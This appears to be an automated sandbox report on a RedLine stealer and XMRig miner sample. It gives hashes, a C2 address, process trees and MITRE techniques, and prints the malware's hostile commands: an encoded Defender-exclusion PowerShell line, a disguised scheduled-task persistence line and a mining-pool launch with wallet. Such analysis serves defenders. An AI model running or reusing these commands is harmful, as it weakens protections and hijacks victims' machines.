redline | 6903e33821d3a689d41e5e45cfd1e9bbb08109b741fe199b030e7e2875d7fbe5

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
23-05-2022 06:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d836a3e33d4b12926305b2c06ffc64d2.exe
Size

1.8MB
MD5

d836a3e33d4b12926305b2c06ffc64d2
SHA1

38960dd289e058379ed31ccc66ae9ad62eebe409
SHA256

6903e33821d3a689d41e5e45cfd1e9bbb08109b741fe199b030e7e2875d7fbe5
SHA512

af4fc4608624e7f616bed02a08a05cc4bbb7d16094eac3b125601460bd0662f5bf7a0431e94cc41b0deebd84a22e8a64b85d39e7fc7cdf1aaafbc1e4d4d8f23c

Score

10^/10

redline xmrig infostealer miner spyware upx

Malware Config

Extracted

Family

redline

141.95.140.173:33470

Attributes

auth_value
aa37980e94b4eaaea7ea880fc1c6804d

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/2388-177-0x00007FF6ECC60000-0x00007FF6ED44C000-memory.dmp	xmrig

Downloads MZ/PE file
Executes dropped EXE 4 IoCs

Processes:

updated.exeupdateed.exeRuntime BrokerRuntime Broker

pid process

2572 updated.exe
2560 updateed.exe
4792 Runtime Broker
2676 Runtime Broker

pid	process
2572	updated.exe
2560	updateed.exe
4792	Runtime Broker
2676	Runtime Broker

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\updated.exe	upx
C:\Users\Admin\AppData\Local\Temp\updated.exe	upx
behavioral2/memory/2388-172-0x00007FF6ECC60000-0x00007FF6ED44C000-memory.dmp	upx
behavioral2/memory/2388-174-0x00007FF6ECC60000-0x00007FF6ED44C000-memory.dmp	upx
behavioral2/memory/2388-175-0x00007FF6ECC60000-0x00007FF6ED44C000-memory.dmp	upx
behavioral2/memory/2388-177-0x00007FF6ECC60000-0x00007FF6ED44C000-memory.dmp	upx
C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker	upx
C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker	upx
C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker	upx

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

updated.exeRuntime BrokerRuntime Broker

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	updated.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	Runtime Broker
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	Runtime Broker

Drops startup file 2 IoCs

Processes:

AppLaunch.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe	AppLaunch.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe	AppLaunch.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 5 IoCs

Processes:

d836a3e33d4b12926305b2c06ffc64d2.exeAppLaunch.exeupdateed.exeupdated.exe

description	pid	process	target process
PID 2128 set thread context of 4456	2128	d836a3e33d4b12926305b2c06ffc64d2.exe	AppLaunch.exe
PID 4456 set thread context of 4440	4456	AppLaunch.exe	AppLaunch.exe
PID 4456 set thread context of 1752	4456	AppLaunch.exe	AppLaunch.exe
PID 2560 set thread context of 1308	2560	updateed.exe	AppLaunch.exe
PID 2572 set thread context of 2388	2572	updated.exe	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4140 schtasks.exe
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 22 Go-http-client/1.1

pid	process
4140	schtasks.exe

description	flow	ioc
HTTP User-Agent header	22	Go-http-client/1.1

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exeAppLaunch.exepowershell.exepowershell.exe

pid	process
4612	powershell.exe
4612	powershell.exe
4440	AppLaunch.exe
4440	AppLaunch.exe
1132	powershell.exe
1132	powershell.exe
4492	powershell.exe
4492	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

664

pid	process
664

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

AppLaunch.exepowershell.exeAppLaunch.exeexplorer.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1752	AppLaunch.exe
Token: SeDebugPrivilege	4612	powershell.exe
Token: SeDebugPrivilege	4440	AppLaunch.exe
Token: SeLockMemoryPrivilege	2388	explorer.exe
Token: SeLockMemoryPrivilege	2388	explorer.exe
Token: SeDebugPrivilege	1132	powershell.exe
Token: SeDebugPrivilege	4492	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

explorer.exe

pid process

2388 explorer.exe

pid	process
2388	explorer.exe

Suspicious use of WriteProcessMemory 51 IoCs

Processes:

d836a3e33d4b12926305b2c06ffc64d2.exeAppLaunch.exeAppLaunch.exeupdated.execmd.exeupdateed.exeRuntime Brokercmd.exeRuntime Brokercmd.exe

description	pid	process	target process
PID 2128 wrote to memory of 4456	2128	d836a3e33d4b12926305b2c06ffc64d2.exe	AppLaunch.exe
PID 2128 wrote to memory of 4456	2128	d836a3e33d4b12926305b2c06ffc64d2.exe	AppLaunch.exe
PID 2128 wrote to memory of 4456	2128	d836a3e33d4b12926305b2c06ffc64d2.exe	AppLaunch.exe
PID 2128 wrote to memory of 4456	2128	d836a3e33d4b12926305b2c06ffc64d2.exe	AppLaunch.exe
PID 2128 wrote to memory of 4456	2128	d836a3e33d4b12926305b2c06ffc64d2.exe	AppLaunch.exe
PID 4456 wrote to memory of 4440	4456	AppLaunch.exe	AppLaunch.exe
PID 4456 wrote to memory of 4440	4456	AppLaunch.exe	AppLaunch.exe
PID 4456 wrote to memory of 4440	4456	AppLaunch.exe	AppLaunch.exe
PID 4456 wrote to memory of 4440	4456	AppLaunch.exe	AppLaunch.exe
PID 4456 wrote to memory of 4440	4456	AppLaunch.exe	AppLaunch.exe
PID 4456 wrote to memory of 4440	4456	AppLaunch.exe	AppLaunch.exe
PID 4456 wrote to memory of 4440	4456	AppLaunch.exe	AppLaunch.exe
PID 4456 wrote to memory of 4440	4456	AppLaunch.exe	AppLaunch.exe
PID 4456 wrote to memory of 1752	4456	AppLaunch.exe	AppLaunch.exe
PID 4456 wrote to memory of 1752	4456	AppLaunch.exe	AppLaunch.exe
PID 4456 wrote to memory of 1752	4456	AppLaunch.exe	AppLaunch.exe
PID 4456 wrote to memory of 1752	4456	AppLaunch.exe	AppLaunch.exe
PID 4456 wrote to memory of 1752	4456	AppLaunch.exe	AppLaunch.exe
PID 4456 wrote to memory of 1752	4456	AppLaunch.exe	AppLaunch.exe
PID 4456 wrote to memory of 1752	4456	AppLaunch.exe	AppLaunch.exe
PID 4456 wrote to memory of 1752	4456	AppLaunch.exe	AppLaunch.exe
PID 1752 wrote to memory of 2572	1752	AppLaunch.exe	updated.exe
PID 1752 wrote to memory of 2572	1752	AppLaunch.exe	updated.exe
PID 1752 wrote to memory of 2560	1752	AppLaunch.exe	updateed.exe
PID 1752 wrote to memory of 2560	1752	AppLaunch.exe	updateed.exe
PID 1752 wrote to memory of 2560	1752	AppLaunch.exe	updateed.exe
PID 2572 wrote to memory of 3524	2572	updated.exe	cmd.exe
PID 2572 wrote to memory of 3524	2572	updated.exe	cmd.exe
PID 3524 wrote to memory of 4612	3524	cmd.exe	powershell.exe
PID 3524 wrote to memory of 4612	3524	cmd.exe	powershell.exe
PID 2572 wrote to memory of 4140	2572	updated.exe	schtasks.exe
PID 2572 wrote to memory of 4140	2572	updated.exe	schtasks.exe
PID 2560 wrote to memory of 1308	2560	updateed.exe	AppLaunch.exe
PID 2560 wrote to memory of 1308	2560	updateed.exe	AppLaunch.exe
PID 2560 wrote to memory of 1308	2560	updateed.exe	AppLaunch.exe
PID 2560 wrote to memory of 1308	2560	updateed.exe	AppLaunch.exe
PID 2560 wrote to memory of 1308	2560	updateed.exe	AppLaunch.exe
PID 2572 wrote to memory of 2388	2572	updated.exe	explorer.exe
PID 2572 wrote to memory of 2388	2572	updated.exe	explorer.exe
PID 2572 wrote to memory of 2388	2572	updated.exe	explorer.exe
PID 2572 wrote to memory of 2388	2572	updated.exe	explorer.exe
PID 2572 wrote to memory of 2388	2572	updated.exe	explorer.exe
PID 2572 wrote to memory of 2388	2572	updated.exe	explorer.exe
PID 4792 wrote to memory of 1600	4792	Runtime Broker	cmd.exe
PID 4792 wrote to memory of 1600	4792	Runtime Broker	cmd.exe
PID 1600 wrote to memory of 1132	1600	cmd.exe	powershell.exe
PID 1600 wrote to memory of 1132	1600	cmd.exe	powershell.exe
PID 2676 wrote to memory of 3896	2676	Runtime Broker	cmd.exe
PID 2676 wrote to memory of 3896	2676	Runtime Broker	cmd.exe
PID 3896 wrote to memory of 4492	3896	cmd.exe	powershell.exe
PID 3896 wrote to memory of 4492	3896	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\d836a3e33d4b12926305b2c06ffc64d2.exe
"C:\Users\Admin\AppData\Local\Temp\d836a3e33d4b12926305b2c06ffc64d2.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2128

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4456

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1752

C:\Users\Admin\AppData\Local\Temp\updated.exe
"C:\Users\Admin\AppData\Local\Temp\updated.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2572

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="
5⤵
- Suspicious use of WriteProcessMemory
PID:3524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4612

C:\Windows\system32\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Runtime Broker" /rl HIGHEST /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker"
5⤵
- Creates scheduled task(s)
PID:4140

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2388

C:\Users\Admin\AppData\Local\Temp\updateed.exe
"C:\Users\Admin\AppData\Local\Temp\updateed.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2560

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
5⤵
- Drops startup file
PID:1308

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4440

C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker
"C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker"
1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4792

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="
2⤵
- Suspicious use of WriteProcessMemory
PID:1600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1132

C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker
"C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker"
1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="
2⤵
- Suspicious use of WriteProcessMemory
PID:3896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4492

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log
Filesize
847B

MD5
f8ec7f563d06ccddddf6c96b8957e5c8

SHA1
73bdc49dcead32f8c29168645a0f080084132252

SHA256
38ef57aec780edd2c8dab614a85ce87351188fce5896ffebc9f69328df2056ed

SHA512
8830821ac9edb4cdf4d8a3d7bc30433987ae4c158cf81b705654f54aaeba366c5fa3509981aceae21e193dd4483f03b9d449bc0a32545927d3ca94b0f9367684

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d8cb3e9459807e35f02130fad3f9860d

SHA1
5af7f32cb8a30e850892b15e9164030a041f4bd6

SHA256
2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

SHA512
045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

Download Submit
C:\Users\Admin\AppData\Local\Temp\updated.exe
Filesize
4.8MB

MD5
b4aa27a1339c69d99121a4fe4fac94f7

SHA1
72cd9ebfd59e9c5a45c22dd5f6aa8d4cb9ba9d26

SHA256
a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6

SHA512
3550565464695370bdc761327eea1502e523a8b5f5780c6d7942e2be480d40a262897009c6e459110ac0b146ad05f69f9c7d099ad88eaca39975907f95d3e184

Download Submit
C:\Users\Admin\AppData\Local\Temp\updated.exe
Filesize
4.8MB

MD5
b4aa27a1339c69d99121a4fe4fac94f7

SHA1
72cd9ebfd59e9c5a45c22dd5f6aa8d4cb9ba9d26

SHA256
a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6

SHA512
3550565464695370bdc761327eea1502e523a8b5f5780c6d7942e2be480d40a262897009c6e459110ac0b146ad05f69f9c7d099ad88eaca39975907f95d3e184

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateed.exe
Filesize
703KB

MD5
a1128f30ff8209aa2a2d414e6da4076f

SHA1
f11ea67c8751e768802ef8185781e180f505036b

SHA256
64ce95ae24281b52d627bb4757c0c816170b865ae9c23e9642e72fefebef1dff

SHA512
493abbea842b2f07b64728678742af6ee464a9d550e191b860df602ed8f6eabcdd99f2700ab4a21c457deea7eae060777dbc98a5d855f5dc7cfa10e59fad91fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateed.exe
Filesize
703KB

MD5
a1128f30ff8209aa2a2d414e6da4076f

SHA1
f11ea67c8751e768802ef8185781e180f505036b

SHA256
64ce95ae24281b52d627bb4757c0c816170b865ae9c23e9642e72fefebef1dff

SHA512
493abbea842b2f07b64728678742af6ee464a9d550e191b860df602ed8f6eabcdd99f2700ab4a21c457deea7eae060777dbc98a5d855f5dc7cfa10e59fad91fe

Download Submit
C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker
Filesize
4.8MB

MD5
b4aa27a1339c69d99121a4fe4fac94f7

SHA1
72cd9ebfd59e9c5a45c22dd5f6aa8d4cb9ba9d26

SHA256
a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6

SHA512
3550565464695370bdc761327eea1502e523a8b5f5780c6d7942e2be480d40a262897009c6e459110ac0b146ad05f69f9c7d099ad88eaca39975907f95d3e184

Download Submit
C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker
Filesize
4.8MB

MD5
b4aa27a1339c69d99121a4fe4fac94f7

SHA1
72cd9ebfd59e9c5a45c22dd5f6aa8d4cb9ba9d26

SHA256
a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6

SHA512
3550565464695370bdc761327eea1502e523a8b5f5780c6d7942e2be480d40a262897009c6e459110ac0b146ad05f69f9c7d099ad88eaca39975907f95d3e184

Download Submit
C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker
Filesize
4.8MB

MD5
b4aa27a1339c69d99121a4fe4fac94f7

SHA1
72cd9ebfd59e9c5a45c22dd5f6aa8d4cb9ba9d26

SHA256
a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6

SHA512
3550565464695370bdc761327eea1502e523a8b5f5780c6d7942e2be480d40a262897009c6e459110ac0b146ad05f69f9c7d099ad88eaca39975907f95d3e184

Download Submit
memory/1132-183-0x0000000000000000-mapping.dmp

Download
memory/1132-187-0x00007FFC16580000-0x00007FFC17041000-memory.dmp

Filesize
10.8MB

Download
memory/1308-166-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/1308-165-0x0000000000000000-mapping.dmp

Download
memory/1600-182-0x0000000000000000-mapping.dmp

Download
memory/1752-141-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/1752-140-0x0000000000000000-mapping.dmp

Download
memory/2388-178-0x00000000008D0000-0x00000000008F0000-memory.dmp

Filesize
128KB

Download
memory/2388-186-0x0000000013350000-0x0000000013370000-memory.dmp

Filesize
128KB

Download
memory/2388-179-0x0000000012DF0000-0x0000000012E30000-memory.dmp

Filesize
256KB

Download
memory/2388-177-0x00007FF6ECC60000-0x00007FF6ED44C000-memory.dmp

Filesize
7.9MB

Download
memory/2388-175-0x00007FF6ECC60000-0x00007FF6ED44C000-memory.dmp

Filesize
7.9MB

Download
memory/2388-174-0x00007FF6ECC60000-0x00007FF6ED44C000-memory.dmp

Filesize
7.9MB

Download
memory/2388-173-0x00007FF6ED4448A0-mapping.dmp

Download
memory/2388-172-0x00007FF6ECC60000-0x00007FF6ED44C000-memory.dmp

Filesize
7.9MB

Download
memory/2560-149-0x0000000000000000-mapping.dmp

Download
memory/2572-146-0x0000000000000000-mapping.dmp

Download
memory/3524-156-0x0000000000000000-mapping.dmp

Download
memory/3896-189-0x0000000000000000-mapping.dmp

Download
memory/4140-164-0x0000000000000000-mapping.dmp

Download
memory/4440-162-0x0000000006DB0000-0x0000000006F72000-memory.dmp

Filesize
1.8MB

Download
memory/4440-139-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/4440-152-0x00000000054D0000-0x0000000005562000-memory.dmp

Filesize
584KB

Download
memory/4440-163-0x00000000074B0000-0x00000000079DC000-memory.dmp

Filesize
5.2MB

Download
memory/4440-153-0x0000000005570000-0x00000000055E6000-memory.dmp

Filesize
472KB

Download
memory/4440-161-0x0000000006B90000-0x0000000006BE0000-memory.dmp

Filesize
320KB

Download
memory/4440-155-0x0000000005630000-0x000000000564E000-memory.dmp

Filesize
120KB

Download
memory/4440-151-0x0000000006290000-0x0000000006834000-memory.dmp

Filesize
5.6MB

Download
memory/4440-138-0x0000000000000000-mapping.dmp

Download
memory/4440-158-0x0000000006070000-0x00000000060D6000-memory.dmp

Filesize
408KB

Download
